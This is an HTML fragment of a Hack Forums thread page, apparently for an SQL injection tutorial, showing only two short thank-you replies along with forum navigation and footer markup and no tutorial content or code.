href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33577312#pid33577312">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1860080"><span class="group2">murfhom</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 8<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1860080"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33577312">nice tutorial :) i really liked the move when set a variable</div><div class="post_meta" id="post_meta_33577312"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1860080" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33577312" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33577377" id="pid33577377"></a><table class="tborder" style="margin-top: 5px; " id="post_33577377" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-27-2013, 02:33 PM <span id="edited_by_33577377"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33577377#pid33577377">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1866645"><span class="group2">shinzoop2</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 12<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1866645"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33577377">thanks for the tutorial helped me so much i think now i understand it a bit better than i used to</div><div class="post_meta" id="post_meta_33577377"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1866645" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33577377" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3567217">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3567217" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3567217&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3567217.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->